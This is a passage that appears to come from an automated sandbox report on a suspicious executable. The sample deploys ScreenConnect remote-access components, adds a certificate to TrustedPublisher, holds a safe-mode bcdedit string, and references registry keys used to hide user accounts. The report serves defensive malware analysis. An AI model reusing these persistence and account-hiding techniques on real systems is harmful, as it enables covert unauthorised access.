                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Qjq85KfhBC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD045E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754070448.0000000003192000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Qjq85KfhBC.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1751348890.00000000028B2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801490320.0000000000A00000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801752921.0000000002371000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0459000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769348036.000000001C272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1746175127.000000000011D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0459000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769348036.000000001C272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD045E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754070448.0000000003192000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02A8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1751788668.0000000004F72000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Qjq85KfhBC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Qjq85KfhBC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Qjq85KfhBC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Qjq85KfhBC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Qjq85KfhBC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.drStatic PE information: 0xBC0F508C [Tue Dec 24 14:17:48 2069 UTC]
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00911000
                  Source: Qjq85KfhBC.exeStatic PE information: real checksum: 0x212e6 should be: 0x20464
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911BC0 push ecx; ret 0_2_00911BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFDBD2A5 pushad ; iretd 1_2_00007FF7BFDBD2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFED00BD pushad ; iretd 1_2_00007FF7BFED00C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFED7D00 push eax; retf 1_2_00007FF7BFED7D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFF08BD8 pushad ; iretd 1_2_00007FF7BFF08BD9
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFED845E push eax; ret 1_2_00007FF7BFED846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFED842E pushad ; ret 1_2_00007FF7BFED845D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF7BFED00BD pushad ; iretd 10_2_00007FF7BFED00C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF7BFED7569 push ebx; iretd 10_2_00007FF7BFED756A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF7BFEEC522 pushad ; ret 10_2_00007FF7BFEEC523
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_05720C11 push eax; ret 12_2_05720C1D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_0574E401 pushad ; ret 12_2_0574E413
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7BFEC00BD pushad ; iretd 13_2_00007FF7BFEC00C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01DDC1D push ebx; ret 13_2_00007FF7C01DDE5A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01D5302 pushad ; ret 13_2_00007FF7C01D5311
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01E23F3 push eax; retf 13_2_00007FF7C01E2759
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01DDD1A push ebx; ret 13_2_00007FF7C01DDE5A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01D2EC6 push ss; retf 13_2_00007FF7C01D2EC7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01E20D1 push eax; retf 13_2_00007FF7C01E2759
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Contains functionality to hide user accounts
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769348036.000000001C272000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.1751348890.00000000028B2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801490320.0000000000A00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801752921.0000000002371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
